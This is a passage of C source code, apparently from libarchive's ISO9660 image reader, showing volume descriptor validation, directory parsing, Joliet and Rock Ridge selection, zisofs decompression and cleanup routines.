if (!isNull(iso9660, h, SVD_reserved2_offset, SVD_reserved2_size))
return (0);
if (!isNull(iso9660, h, SVD_reserved3_offset, SVD_reserved3_size))
return (0);
/* File structure version must be 1 for ISO9660/ECMA119. */
if (h[SVD_file_structure_version_offset] != 1)
return (0);
logical_block_size =
archive_le16dec(h + SVD_logical_block_size_offset);
if (logical_block_size <= 0)
return (0);
volume_block = archive_le32dec(h + SVD_volume_space_size_offset);
if (volume_block <= SYSTEM_AREA_BLOCK+4)
return (0);
/* Location of Occurrence of Type L Path Table must be
* available location,
* >= SYSTEM_AREA_BLOCK(16) + 2 and < Volume Space Size. */
location = archive_le32dec(h+SVD_type_L_path_table_offset);
if (location < SYSTEM_AREA_BLOCK+2 || location >= volume_block)
return (0);
/* The Type M Path Table must be at a valid location (WinISO
* and probably other programs omit this, so we allow zero)
*
* >= SYSTEM_AREA_BLOCK(16) + 2 and < Volume Space Size. */
location = archive_be32dec(h+SVD_type_M_path_table_offset);
if ((location > 0 && location < SYSTEM_AREA_BLOCK+2)
|| location >= volume_block)
return (0);
/* Read Root Directory Record in Volume Descriptor. */
p = h + SVD_root_directory_record_offset;
if (p[DR_length_offset] != 34)
return (0);
return (48);
}
static int
isEVD(struct iso9660 *iso9660, const unsigned char *h)
{
const unsigned char *p;
ssize_t logical_block_size;
int32_t volume_block;
int32_t location;
(void)iso9660; /* UNUSED */
/* Type of the Enhanced Volume Descriptor must be 2. */
if (h[PVD_type_offset] != 2)
return (0);
/* EVD version must be 2. */
if (h[PVD_version_offset] != 2)
return (0);
/* Reserved field must be 0. */
if (h[PVD_reserved1_offset] != 0)
return (0);
/* Reserved field must be 0. */
if (!isNull(iso9660, h, PVD_reserved2_offset, PVD_reserved2_size))
return (0);
/* Reserved field must be 0. */
if (!isNull(iso9660, h, PVD_reserved3_offset, PVD_reserved3_size))
return (0);
/* Logical block size must be > 0. */
/* I've looked at Ecma 119 and can't find any stronger
* restriction on this field. */
logical_block_size =
archive_le16dec(h + PVD_logical_block_size_offset);
if (logical_block_size <= 0)
return (0);
volume_block =
archive_le32dec(h + PVD_volume_space_size_offset);
if (volume_block <= SYSTEM_AREA_BLOCK+4)
return (0);
/* File structure version must be 2 for ISO9660:1999. */
if (h[PVD_file_structure_version_offset] != 2)
return (0);
/* Location of Occurrence of Type L Path Table must be
* available location,
* >= SYSTEM_AREA_BLOCK(16) + 2 and < Volume Space Size. */
location = archive_le32dec(h+PVD_type_1_path_table_offset);
if (location < SYSTEM_AREA_BLOCK+2 || location >= volume_block)
return (0);
/* Location of Occurrence of Type M Path Table must be
* available location,
* >= SYSTEM_AREA_BLOCK(16) + 2 and < Volume Space Size. */
location = archive_be32dec(h+PVD_type_m_path_table_offset);
if ((location > 0 && location < SYSTEM_AREA_BLOCK+2)
|| location >= volume_block)
return (0);
/* Reserved field must be 0. */
if (!isNull(iso9660, h, PVD_reserved4_offset, PVD_reserved4_size))
return (0);
/* Reserved field must be 0. */
if (!isNull(iso9660, h, PVD_reserved5_offset, PVD_reserved5_size))
return (0);
/* Read Root Directory Record in Volume Descriptor. */
p = h + PVD_root_directory_record_offset;
if (p[DR_length_offset] != 34)
return (0);
return (48);
}
static int
isPVD(struct iso9660 *iso9660, const unsigned char *h)
{
const unsigned char *p;
ssize_t logical_block_size;
int32_t volume_block;
int32_t location;
int i;
/* Type of the Primary Volume Descriptor must be 1. */
if (h[PVD_type_offset] != 1)
return (0);
/* PVD version must be 1. */
if (h[PVD_version_offset] != 1)
return (0);
/* Reserved field must be 0. */
if (h[PVD_reserved1_offset] != 0)
return (0);
/* Reserved field must be 0. */
if (!isNull(iso9660, h, PVD_reserved2_offset, PVD_reserved2_size))
return (0);
/* Reserved field must be 0. */
if (!isNull(iso9660, h, PVD_reserved3_offset, PVD_reserved3_size))
return (0);
/* Logical block size must be > 0. */
/* I've looked at Ecma 119 and can't find any stronger
* restriction on this field. */
logical_block_size =
archive_le16dec(h + PVD_logical_block_size_offset);
if (logical_block_size <= 0)
return (0);
volume_block = archive_le32dec(h + PVD_volume_space_size_offset);
if (volume_block <= SYSTEM_AREA_BLOCK+4)
return (0);
/* File structure version must be 1 for ISO9660/ECMA119. */
if (h[PVD_file_structure_version_offset] != 1)
return (0);
/* Location of Occurrence of Type L Path Table must be
* available location,
* >= SYSTEM_AREA_BLOCK(16) + 2 and < Volume Space Size. */
location = archive_le32dec(h+PVD_type_1_path_table_offset);
if (location < SYSTEM_AREA_BLOCK+2 || location >= volume_block)
return (0);
/* The Type M Path Table must also be at a valid location
* (although ECMA 119 requires a Type M Path Table, WinISO and
* probably other programs omit it, so we permit a zero here)
*
* >= SYSTEM_AREA_BLOCK(16) + 2 and < Volume Space Size. */
location = archive_be32dec(h+PVD_type_m_path_table_offset);
if ((location > 0 && location < SYSTEM_AREA_BLOCK+2)
|| location >= volume_block)
return (0);
/* Reserved field must be 0. */
/* But accept NetBSD/FreeBSD "makefs" images with 0x20 here. */
for (i = 0; i < PVD_reserved4_size; ++i)
if (h[PVD_reserved4_offset + i] != 0
&& h[PVD_reserved4_offset + i] != 0x20)
return (0);
/* Reserved field must be 0. */
if (!isNull(iso9660, h, PVD_reserved5_offset, PVD_reserved5_size))
return (0);
/* XXX TODO: Check other values for sanity; reject more
* malformed PVDs. XXX */
/* Read Root Directory Record in Volume Descriptor. */
p = h + PVD_root_directory_record_offset;
if (p[DR_length_offset] != 34)
return (0);
if (!iso9660->primary.location) {
iso9660->logical_block_size = logical_block_size;
iso9660->volume_block = volume_block;
iso9660->volume_size =
logical_block_size * (uint64_t)volume_block;
iso9660->primary.location =
archive_le32dec(p + DR_extent_offset);
iso9660->primary.size = archive_le32dec(p + DR_size_offset);
}
return (48);
}
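/* Read the directory extent belonging to 'parent', parse every child
 * record (skipping the '.' and '..' entries), merge multi-extent files
 * into a single entry, queue each child on the pending_files heap, and
 * finally process any RRIP "CE" continuation areas queued while parsing. */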
static int
read_children(struct archive_read *a, struct file_info *parent)
{
struct iso9660 *iso9660;
const unsigned char *b, *p;
struct file_info *multi;
size_t step, skip_size;
iso9660 = (struct iso9660 *)(a->format->data);
/* Flush any remaining bytes from the last round to ensure
* we are positioned correctly. */
if (iso9660->entry_bytes_unconsumed) {
__archive_read_consume(a, iso9660->entry_bytes_unconsumed);
iso9660->entry_bytes_unconsumed = 0;
}
if (iso9660->current_position > parent->offset) {
archive_set_error(&a->archive, ARCHIVE_ERRNO_MISC,
"Ignoring out-of-order directory (%s) %jd > %jd",
parent->name.s,
(intmax_t)iso9660->current_position,
(intmax_t)parent->offset);
return (ARCHIVE_WARN);
}
if (parent->offset + parent->size > iso9660->volume_size) {
archive_set_error(&a->archive, ARCHIVE_ERRNO_MISC,
"Directory is beyond end-of-media: %s",
parent->name.s);
return (ARCHIVE_WARN);
}
if (iso9660->current_position < parent->offset) {
int64_t skipsize;
skipsize = parent->offset - iso9660->current_position;
skipsize = __archive_read_consume(a, skipsize);
if (skipsize < 0)
return ((int)skipsize);
iso9660->current_position = parent->offset;
}
step = (size_t)(((parent->size + iso9660->logical_block_size -1) /
iso9660->logical_block_size) * iso9660->logical_block_size);
b = __archive_read_ahead(a, step, NULL);
if (b == NULL) {
archive_set_error(&a->archive, ARCHIVE_ERRNO_MISC,
"Failed to read full block when scanning "
"ISO9660 directory list");
return (ARCHIVE_FATAL);
}
iso9660->current_position += step;
multi = NULL;
skip_size = step;
while (step) {
p = b;
b += iso9660->logical_block_size;
step -= iso9660->logical_block_size;
for (; *p != 0 && p < b && p + *p <= b; p += *p) {
struct file_info *child;
/* N.B.: these special directory identifiers
* are 8 bit "values" even on a
* Joliet CD with UCS-2 (16bit) encoding.
*/
/* Skip '.' entry. */
if (*(p + DR_name_len_offset) == 1
&& *(p + DR_name_offset) == '\0')
continue;
/* Skip '..' entry. */
if (*(p + DR_name_len_offset) == 1
&& *(p + DR_name_offset) == '\001')
continue;
child = parse_file_info(a, parent, p);
if (child == NULL) {
__archive_read_consume(a, skip_size);
return (ARCHIVE_FATAL);
}
if (child->cl_offset == 0 &&
(child->multi_extent || multi != NULL)) {
struct content *con;
if (multi == NULL) {
multi = child;
multi->contents.first = NULL;
multi->contents.last =
&(multi->contents.first);
}
con = malloc(sizeof(struct content));
if (con == NULL) {
archive_set_error(
&a->archive, ENOMEM,
"No memory for multi extent");
__archive_read_consume(a, skip_size);
return (ARCHIVE_FATAL);
}
con->offset = child->offset;
con->size = child->size;
con->next = NULL;
*multi->contents.last = con;
multi->contents.last = &(con->next);
if (multi == child) {
if (add_entry(a, iso9660, child)
!= ARCHIVE_OK)
return (ARCHIVE_FATAL);
} else {
multi->size += child->size;
if (!child->multi_extent)
multi = NULL;
}
} else
if (add_entry(a, iso9660, child) != ARCHIVE_OK)
return (ARCHIVE_FATAL);
}
}
__archive_read_consume(a, skip_size);
/* Read data recorded by the RRIP "CE" extension. */
if (read_CE(a, iso9660) != ARCHIVE_OK)
return (ARCHIVE_FATAL);
return (ARCHIVE_OK);
}
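/* Decide which volume descriptor tree to read: the primary descriptor
 * (preferred when Rock Ridge data is present) or the Joliet
 * supplementary descriptor. The chosen root directory record is pushed
 * onto the pending_files heap. */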
static int
choose_volume(struct archive_read *a, struct iso9660 *iso9660)
{
struct file_info *file;
int64_t skipsize;
struct vd *vd;
const void *block;
char seenJoliet;
vd = &(iso9660->primary);
if (!iso9660->opt_support_joliet)
iso9660->seenJoliet = 0;
if (iso9660->seenJoliet &&
vd->location > iso9660->joliet.location)
/* This condition is unlikely; by way of caution. */
vd = &(iso9660->joliet);
skipsize = LOGICAL_BLOCK_SIZE * vd->location;
skipsize = __archive_read_consume(a, skipsize);
if (skipsize < 0)
return ((int)skipsize);
iso9660->current_position = skipsize;
block = __archive_read_ahead(a, vd->size, NULL);
if (block == NULL) {
archive_set_error(&a->archive, ARCHIVE_ERRNO_MISC,
"Failed to read full block when scanning "
"ISO9660 directory list");
return (ARCHIVE_FATAL);
}
/*
* While reading the Root Directory, the seenJoliet flag must be zero
* so that the special name 0x00 (Current Directory) and the following
* byte are not converted to UCS-2.
*/
seenJoliet = iso9660->seenJoliet;/* Save flag. */
iso9660->seenJoliet = 0;
file = parse_file_info(a, NULL, block);
if (file == NULL)
return (ARCHIVE_FATAL);
iso9660->seenJoliet = seenJoliet;
/*
* If the iso image has both RockRidge and Joliet, we preferentially
* use RockRidge Extensions rather than Joliet ones.
*/
if (vd == &(iso9660->primary) && iso9660->seenRockridge
&& iso9660->seenJoliet)
iso9660->seenJoliet = 0;
if (vd == &(iso9660->primary) && !iso9660->seenRockridge
&& iso9660->seenJoliet) {
/* Switch reading data from primary to joliet. */
vd = &(iso9660->joliet);
skipsize = LOGICAL_BLOCK_SIZE * vd->location;
skipsize -= iso9660->current_position;
skipsize = __archive_read_consume(a, skipsize);
if (skipsize < 0)
return ((int)skipsize);
iso9660->current_position += skipsize;
block = __archive_read_ahead(a, vd->size, NULL);
if (block == NULL) {
archive_set_error(&a->archive, ARCHIVE_ERRNO_MISC,
"Failed to read full block when scanning "
"ISO9660 directory list");
return (ARCHIVE_FATAL);
}
iso9660->seenJoliet = 0;
file = parse_file_info(a, NULL, block);
if (file == NULL)
return (ARCHIVE_FATAL);
iso9660->seenJoliet = seenJoliet;
}
/* Store the root directory in the pending list. */
if (add_entry(a, iso9660, file) != ARCHIVE_OK)
return (ARCHIVE_FATAL);
if (iso9660->seenRockridge) {
a->archive.archive_format = ARCHIVE_FORMAT_ISO9660_ROCKRIDGE;
a->archive.archive_format_name =
"ISO9660 with Rockridge extensions";
}
return (ARCHIVE_OK);
}
static int
archive_read_format_iso9660_read_header(struct archive_read *a,
struct archive_entry *entry)
{
struct iso9660 *iso9660;
struct file_info *file;
int r, rd_r = ARCHIVE_OK;
iso9660 = (struct iso9660 *)(a->format->data);
if (!a->archive.archive_format) {
a->archive.archive_format = ARCHIVE_FORMAT_ISO9660;
a->archive.archive_format_name = "ISO9660";
}
if (iso9660->current_position == 0) {
r = choose_volume(a, iso9660);
if (r != ARCHIVE_OK)
return (r);
}
file = NULL;/* Eliminate a warning. */
/* Get the next entry that appears after the current offset. */
r = next_entry_seek(a, iso9660, &file);
if (r != ARCHIVE_OK)
return (r);
if (iso9660->seenJoliet) {
/*
* Convert the UTF-16BE filename to the local locale MBS
* and store the result in the pathname field.
*/
if (iso9660->sconv_utf16be == NULL) {
iso9660->sconv_utf16be =
archive_string_conversion_from_charset(
&(a->archive), "UTF-16BE", 1);
if (iso9660->sconv_utf16be == NULL)
/* Couldn't allocate memory */
return (ARCHIVE_FATAL);
}
if (iso9660->utf16be_path == NULL) {
iso9660->utf16be_path = malloc(UTF16_NAME_MAX);
if (iso9660->utf16be_path == NULL) {
archive_set_error(&a->archive, ENOMEM,
"No memory");
return (ARCHIVE_FATAL);
}
}
if (iso9660->utf16be_previous_path == NULL) {
iso9660->utf16be_previous_path = malloc(UTF16_NAME_MAX);
if (iso9660->utf16be_previous_path == NULL) {
archive_set_error(&a->archive, ENOMEM,
"No memory");
return (ARCHIVE_FATAL);
}
}
iso9660->utf16be_path_len = 0;
if (build_pathname_utf16be(iso9660->utf16be_path,
UTF16_NAME_MAX, &(iso9660->utf16be_path_len), file) != 0) {
archive_set_error(&a->archive,
ARCHIVE_ERRNO_FILE_FORMAT,
"Pathname is too long");
return (ARCHIVE_FATAL);
}
r = archive_entry_copy_pathname_l(entry,
(const char *)iso9660->utf16be_path,
iso9660->utf16be_path_len,
iso9660->sconv_utf16be);
if (r != 0) {
if (errno == ENOMEM) {
archive_set_error(&a->archive, ENOMEM,
"No memory for Pathname");
return (ARCHIVE_FATAL);
}
archive_set_error(&a->archive,
ARCHIVE_ERRNO_FILE_FORMAT,
"Pathname cannot be converted "
"from %s to current locale.",
archive_string_conversion_charset_name(
iso9660->sconv_utf16be));
rd_r = ARCHIVE_WARN;
}
} else {
const char *path = build_pathname(&iso9660->pathname, file, 0);
if (path == NULL) {
archive_set_error(&a->archive,
ARCHIVE_ERRNO_FILE_FORMAT,
"Pathname is too long");
return (ARCHIVE_FATAL);
} else {
archive_string_empty(&iso9660->pathname);
archive_entry_set_pathname(entry, path);
}
}
iso9660->entry_bytes_remaining = file->size;
/* Offset for sparse-file-aware clients. */
iso9660->entry_sparse_offset = 0;
if (file->offset + file->size > iso9660->volume_size) {
archive_set_error(&a->archive, ARCHIVE_ERRNO_MISC,
"File is beyond end-of-media: %s",
archive_entry_pathname(entry));
iso9660->entry_bytes_remaining = 0;
return (ARCHIVE_WARN);
}
/* Set up the entry structure with information about this entry. */
archive_entry_set_mode(entry, file->mode);
archive_entry_set_uid(entry, file->uid);
archive_entry_set_gid(entry, file->gid);
archive_entry_set_nlink(entry, file->nlinks);
if (file->birthtime_is_set)
archive_entry_set_birthtime(entry, file->birthtime, 0);
else
archive_entry_unset_birthtime(entry);
archive_entry_set_mtime(entry, file->mtime, 0);
archive_entry_set_ctime(entry, file->ctime, 0);
archive_entry_set_atime(entry, file->atime, 0);
/* N.B.: Rock Ridge supports 64-bit device numbers. */
archive_entry_set_rdev(entry, (dev_t)file->rdev);
archive_entry_set_size(entry, iso9660->entry_bytes_remaining);
if (file->symlink.s != NULL)
archive_entry_copy_symlink(entry, file->symlink.s);
/* Note: If the input isn't seekable, we can't rewind to
* return the same body again, so if the next entry refers to
* the same data, we have to return it as a hardlink to the
* original entry. */
if (file->number != -1 &&
file->number == iso9660->previous_number) {
if (iso9660->seenJoliet) {
r = archive_entry_copy_hardlink_l(entry,
(const char *)iso9660->utf16be_previous_path,
iso9660->utf16be_previous_path_len,
iso9660->sconv_utf16be);
if (r != 0) {
if (errno == ENOMEM) {
archive_set_error(&a->archive, ENOMEM,
"No memory for Linkname");
return (ARCHIVE_FATAL);
}
archive_set_error(&a->archive,
ARCHIVE_ERRNO_FILE_FORMAT,
"Linkname cannot be converted "
"from %s to current locale.",
archive_string_conversion_charset_name(
iso9660->sconv_utf16be));
rd_r = ARCHIVE_WARN;
}
} else
archive_entry_set_hardlink(entry,
iso9660->previous_pathname.s);
archive_entry_unset_size(entry);
iso9660->entry_bytes_remaining = 0;
return (rd_r);
}
if ((file->mode & AE_IFMT) != AE_IFDIR &&
file->offset < iso9660->current_position) {
int64_t r64;
r64 = __archive_read_seek(a, file->offset, SEEK_SET);
if (r64 != (int64_t)file->offset) {
/* We can't seek backwards to extract it, so issue
* a warning. Note that this can only happen if
* this entry was added to the heap after we passed
* this offset, that is, only if the directory
* mentioning this entry is later than the body of
* the entry. Such layouts are very unusual; most
* ISO9660 writers lay out and record all directory
* information first, then store all file bodies. */
archive_set_error(&a->archive, ARCHIVE_ERRNO_MISC,
"Ignoring out-of-order file @%jx (%s) %jd < %jd",
(intmax_t)file->number,
iso9660->pathname.s,
(intmax_t)file->offset,
(intmax_t)iso9660->current_position);
iso9660->entry_bytes_remaining = 0;
return (ARCHIVE_WARN);
}
iso9660->current_position = (uint64_t)r64;
}
/* Initialize zisofs variables. */
iso9660->entry_zisofs.pz = file->pz;
if (file->pz) {
#ifdef HAVE_ZLIB_H
struct zisofs *zisofs;
zisofs = &iso9660->entry_zisofs;
zisofs->initialized = 0;
zisofs->pz_log2_bs = file->pz_log2_bs;
zisofs->pz_uncompressed_size = file->pz_uncompressed_size;
zisofs->pz_offset = 0;
zisofs->header_avail = 0;
zisofs->header_passed = 0;
zisofs->block_pointers_avail = 0;
#endif
archive_entry_set_size(entry, file->pz_uncompressed_size);
}
iso9660->previous_number = file->number;
if (iso9660->seenJoliet) {
memcpy(iso9660->utf16be_previous_path, iso9660->utf16be_path,
iso9660->utf16be_path_len);
iso9660->utf16be_previous_path_len = iso9660->utf16be_path_len;
} else
archive_strcpy(
&iso9660->previous_pathname, iso9660->pathname.s);
/* Reset entry_bytes_remaining if the file is multi extent. */
iso9660->entry_content = file->contents.first;
if (iso9660->entry_content != NULL)
iso9660->entry_bytes_remaining = iso9660->entry_content->size;
if (archive_entry_filetype(entry) == AE_IFDIR) {
/* Overwrite nlinks by proper link number which is
* calculated from number of sub directories. */
archive_entry_set_nlink(entry, 2 + file->subdirs);
/* Directory data has been read completely. */
iso9660->entry_bytes_remaining = 0;
}
if (rd_r != ARCHIVE_OK)
return (rd_r);
return (ARCHIVE_OK);
}
static int
archive_read_format_iso9660_read_data_skip(struct archive_read *a)
{
/* Because read_next_header always does an explicit skip
* to the next entry, we don't need to do anything here. */
(void)a; /* UNUSED */
return (ARCHIVE_OK);
}
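/* zisofs (paged zlib) support: a compressed file body starts with a
 * 16-byte header followed by a table of 32-bit block pointers.
 * zisofs_read_data() accumulates the header and the pointer table on
 * the first calls, then inflates one compressed block per call into
 * uncompressed_buffer; a block whose start and end pointers are equal
 * represents a hole and is expanded to zeroes. */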
#ifdef HAVE_ZLIB_H
static int
zisofs_read_data(struct archive_read *a,
const void **buff, size_t *size, int64_t *offset)
{
struct iso9660 *iso9660;
struct zisofs *zisofs;
const unsigned char *p;
size_t avail;
ssize_t bytes_read;
size_t uncompressed_size;
int r;
iso9660 = (struct iso9660 *)(a->format->data);
zisofs = &iso9660->entry_zisofs;
p = __archive_read_ahead(a, 1, &bytes_read);
if (bytes_read <= 0) {
archive_set_error(&a->archive, ARCHIVE_ERRNO_FILE_FORMAT,
"Truncated zisofs file body");
return (ARCHIVE_FATAL);
}
if (bytes_read > iso9660->entry_bytes_remaining)
bytes_read = (ssize_t)iso9660->entry_bytes_remaining;
avail = bytes_read;
uncompressed_size = 0;
if (!zisofs->initialized) {
size_t ceil, xsize;
/* Allocate block pointers buffer. */
ceil = (size_t)((zisofs->pz_uncompressed_size +
(((int64_t)1) << zisofs->pz_log2_bs) - 1)
>> zisofs->pz_log2_bs);
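/* The pointer table holds one 32-bit entry per block plus a
 * trailing end-of-data pointer, hence (ceil + 1) * 4 bytes. */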
xsize = (ceil + 1) * 4;
if (zisofs->block_pointers_alloc < xsize) {
size_t alloc;
if (zisofs->block_pointers != NULL)
free(zisofs->block_pointers);
alloc = ((xsize >> 10) + 1) << 10;
zisofs->block_pointers = malloc(alloc);
if (zisofs->block_pointers == NULL) {
archive_set_error(&a->archive, ENOMEM,
"No memory for zisofs decompression");
return (ARCHIVE_FATAL);
}
zisofs->block_pointers_alloc = alloc;
}
zisofs->block_pointers_size = xsize;
/* Allocate uncompressed data buffer. */
xsize = (size_t)1UL << zisofs->pz_log2_bs;
if (zisofs->uncompressed_buffer_size < xsize) {
if (zisofs->uncompressed_buffer != NULL)
free(zisofs->uncompressed_buffer);
zisofs->uncompressed_buffer = malloc(xsize);
if (zisofs->uncompressed_buffer == NULL) {
archive_set_error(&a->archive, ENOMEM,
"No memory for zisofs decompression");
return (ARCHIVE_FATAL);
}
}
zisofs->uncompressed_buffer_size = xsize;
/*
* Read the file header, and check the magic code of zisofs.
*/
if (zisofs->header_avail < sizeof(zisofs->header)) {
xsize = sizeof(zisofs->header) - zisofs->header_avail;
if (avail < xsize)
xsize = avail;
memcpy(zisofs->header + zisofs->header_avail, p, xsize);
zisofs->header_avail += xsize;
avail -= xsize;
p += xsize;
}
if (!zisofs->header_passed &&
zisofs->header_avail == sizeof(zisofs->header)) {
int err = 0;
if (memcmp(zisofs->header, zisofs_magic,
sizeof(zisofs_magic)) != 0)
err = 1;
if (archive_le32dec(zisofs->header + 8)
!= zisofs->pz_uncompressed_size)
err = 1;
if (zisofs->header[12] != 4)
err = 1;
if (zisofs->header[13] != zisofs->pz_log2_bs)
err = 1;
if (err) {
archive_set_error(&a->archive,
ARCHIVE_ERRNO_FILE_FORMAT,
"Illegal zisofs file body");
return (ARCHIVE_FATAL);
}
zisofs->header_passed = 1;
}
/*
* Read block pointers.
*/
if (zisofs->header_passed &&
zisofs->block_pointers_avail < zisofs->block_pointers_size) {
xsize = zisofs->block_pointers_size
- zisofs->block_pointers_avail;
if (avail < xsize)
xsize = avail;
memcpy(zisofs->block_pointers
+ zisofs->block_pointers_avail, p, xsize);
zisofs->block_pointers_avail += xsize;
avail -= xsize;
p += xsize;
if (zisofs->block_pointers_avail
== zisofs->block_pointers_size) {
/* We've got all block pointers and initialize
* related variables. */
zisofs->block_off = 0;
zisofs->block_avail = 0;
/* Initialization complete. */
zisofs->initialized = 1;
}
}
if (!zisofs->initialized)
goto next_data; /* We need more data. */
}
/*
* Get block offsets from block pointers.
*/
if (zisofs->block_avail == 0) {
uint32_t bst, bed;
if (zisofs->block_off + 4 >= zisofs->block_pointers_size) {
/* There isn't a pair of offsets. */
archive_set_error(&a->archive,
ARCHIVE_ERRNO_FILE_FORMAT,
"Illegal zisofs block pointers");
return (ARCHIVE_FATAL);
}
bst = archive_le32dec(
zisofs->block_pointers + zisofs->block_off);
if (bst != zisofs->pz_offset + (bytes_read - avail)) {
/* TODO: Should we seek offset of current file
* by bst ? */
archive_set_error(&a->archive,
ARCHIVE_ERRNO_FILE_FORMAT,
"Illegal zisofs block pointers(cannot seek)");
return (ARCHIVE_FATAL);
}
bed = archive_le32dec(
zisofs->block_pointers + zisofs->block_off + 4);
if (bed < bst) {
archive_set_error(&a->archive,
ARCHIVE_ERRNO_FILE_FORMAT,
"Illegal zisofs block pointers");
return (ARCHIVE_FATAL);
}
zisofs->block_avail = bed - bst;
zisofs->block_off += 4;
/* Initialize compression library for new block. */
if (zisofs->stream_valid)
r = inflateReset(&zisofs->stream);
else
r = inflateInit(&zisofs->stream);
if (r != Z_OK) {
archive_set_error(&a->archive, ARCHIVE_ERRNO_MISC,
"Can't initialize zisofs decompression.");
return (ARCHIVE_FATAL);
}
zisofs->stream_valid = 1;
zisofs->stream.total_in = 0;
zisofs->stream.total_out = 0;
}
/*
* Make uncompressed data.
*/
if (zisofs->block_avail == 0) {
memset(zisofs->uncompressed_buffer, 0,
zisofs->uncompressed_buffer_size);
uncompressed_size = zisofs->uncompressed_buffer_size;
} else {
zisofs->stream.next_in = (Bytef *)(uintptr_t)(const void *)p;
if (avail > zisofs->block_avail)
zisofs->stream.avail_in = zisofs->block_avail;
else
zisofs->stream.avail_in = (uInt)avail;
zisofs->stream.next_out = zisofs->uncompressed_buffer;
zisofs->stream.avail_out =
(uInt)zisofs->uncompressed_buffer_size;
r = inflate(&zisofs->stream, 0);
switch (r) {
case Z_OK: /* Decompressor made some progress.*/
case Z_STREAM_END: /* Found end of stream. */
break;
default:
archive_set_error(&a->archive, ARCHIVE_ERRNO_MISC,
"zisofs decompression failed (%d)", r);
return (ARCHIVE_FATAL);
}
uncompressed_size =
zisofs->uncompressed_buffer_size - zisofs->stream.avail_out;
avail -= zisofs->stream.next_in - p;
zisofs->block_avail -= (uint32_t)(zisofs->stream.next_in - p);
}
next_data:
bytes_read -= avail;
*buff = zisofs->uncompressed_buffer;
*size = uncompressed_size;
*offset = iso9660->entry_sparse_offset;
iso9660->entry_sparse_offset += uncompressed_size;
iso9660->entry_bytes_remaining -= bytes_read;
iso9660->current_position += bytes_read;
zisofs->pz_offset += (uint32_t)bytes_read;
iso9660->entry_bytes_unconsumed += bytes_read;
return (ARCHIVE_OK);
}
#else /* HAVE_ZLIB_H */
static int
zisofs_read_data(struct archive_read *a,
const void **buff, size_t *size, int64_t *offset)
{
(void)buff;/* UNUSED */
(void)size;/* UNUSED */
(void)offset;/* UNUSED */
archive_set_error(&a->archive, ARCHIVE_ERRNO_FILE_FORMAT,
"zisofs is not supported on this platform.");
return (ARCHIVE_FAILED);
}
#endif /* HAVE_ZLIB_H */
static int
archive_read_format_iso9660_read_data(struct archive_read *a,
const void **buff, size_t *size, int64_t *offset)
{
ssize_t bytes_read;
struct iso9660 *iso9660;
iso9660 = (struct iso9660 *)(a->format->data);
if (iso9660->entry_bytes_unconsumed) {
__archive_read_consume(a, iso9660->entry_bytes_unconsumed);
iso9660->entry_bytes_unconsumed = 0;
}
if (iso9660->entry_bytes_remaining <= 0) {
if (iso9660->entry_content != NULL)
iso9660->entry_content = iso9660->entry_content->next;
if (iso9660->entry_content == NULL) {
*buff = NULL;
*size = 0;
*offset = iso9660->entry_sparse_offset;
return (ARCHIVE_EOF);
}
/* Seek forward to the start of the entry. */
if (iso9660->current_position < iso9660->entry_content->offset) {
int64_t step;
step = iso9660->entry_content->offset -
iso9660->current_position;
step = __archive_read_consume(a, step);
if (step < 0)
return ((int)step);
iso9660->current_position =
iso9660->entry_content->offset;
}
if (iso9660->entry_content->offset < iso9660->current_position) {
archive_set_error(&a->archive, ARCHIVE_ERRNO_MISC,
"Ignoring out-of-order file (%s) %jd < %jd",
iso9660->pathname.s,
(intmax_t)iso9660->entry_content->offset,
(intmax_t)iso9660->current_position);
*buff = NULL;
*size = 0;
*offset = iso9660->entry_sparse_offset;
return (ARCHIVE_WARN);
}
iso9660->entry_bytes_remaining = iso9660->entry_content->size;
}
if (iso9660->entry_zisofs.pz)
return (zisofs_read_data(a, buff, size, offset));
*buff = __archive_read_ahead(a, 1, &bytes_read);
if (bytes_read == 0)
archive_set_error(&a->archive, ARCHIVE_ERRNO_MISC,
"Truncated input file");
if (*buff == NULL)
return (ARCHIVE_FATAL);
if (bytes_read > iso9660->entry_bytes_remaining)
bytes_read = (ssize_t)iso9660->entry_bytes_remaining;
*size = bytes_read;
*offset = iso9660->entry_sparse_offset;
iso9660->entry_sparse_offset += bytes_read;
iso9660->entry_bytes_remaining -= bytes_read;
iso9660->entry_bytes_unconsumed = bytes_read;
iso9660->current_position += bytes_read;
return (ARCHIVE_OK);
}
static int
archive_read_format_iso9660_cleanup(struct archive_read *a)
{
struct iso9660 *iso9660;
int r = ARCHIVE_OK;
iso9660 = (struct iso9660 *)(a->format->data);
release_files(iso9660);
free(iso9660->read_ce_req.reqs);
archive_string_free(&iso9660->pathname);
archive_string_free(&iso9660->previous_pathname);
if (iso9660->pending_files.files)
free(iso9660->pending_files.files);
#ifdef HAVE_ZLIB_H
free(iso9660->entry_zisofs.uncompressed_buffer);
free(iso9660->entry_zisofs.block_pointers);
if (iso9660->entry_zisofs.stream_valid) {
if (inflateEnd(&iso9660->entry_zisofs.stream) != Z_OK) {
archive_set_error(&a->archive, ARCHIVE_ERRNO_MISC,
"Failed to clean up zlib decompressor");
r = ARCHIVE_FATAL;
}
}
#endif
free(iso9660->utf16be_path);
free(iso9660->utf16be_previous_path);
free(iso9660);
(a->format->data) = NULL;
return (r);
}
/*
* This routine parses a single ISO directory record, makes sense
* of any extensions, and stores the result in memory.
*/
static struct file_info *
parse_file_info(struct archive_read *a, struct file_info *parent,
const unsigned char *isodirrec)
{
struct iso9660 *iso9660;
struct file_info *file, *filep;
size_t name_len;
const unsigned char *rr_start, *rr_end;
const unsigned char *p;
size_t dr_len;
uint64_t fsize, offset;
int32_t location;
int flags;
iso9660 = (struct iso9660 *)(a->format->data);
dr_len = (size_t)isodirrec[DR_length_offset];
name_len = (size_t)isodirrec[DR_name_len_offset];
location = archive_le32dec(isodirrec + DR_extent_offset);
fsize = toi(isodirrec + DR_size_offset, DR_size_size);
/* Sanity check that dr_len needs at least 34. */
if (dr_len < 34) {
archive_set_error(&a->archive, ARCHIVE_ERRNO_MISC,
"Invalid length of directory record");
return (NULL);
}
/* Sanity check that name_len doesn't exceed dr_len. */
if (dr_len - 33 < name_len || name_len == 0) {
archive_set_error(&a->archive, ARCHIVE_ERRNO_MISC,
"Invalid length of file identifier");
return (NULL);
}
/* Sanity check that location doesn't exceed volume block.
* Don't check the lower limit of location; the location can
* legitimately be negative when the file is a symbolic link
* or the file size is zero. As far as I know, recent mkisofs
* does that.
*/
if (location > 0 &&
(location + ((fsize + iso9660->logical_block_size -1)
/ iso9660->logical_block_size))
> (uint32_t)iso9660->volume_block) {
archive_set_error(&a->archive, ARCHIVE_ERRNO_MISC,
"Invalid location of extent of file");
return (NULL);
}
/* Sanity check that location is not negative when the file is
* not empty; a negative value would yield an impossibly large offset. */
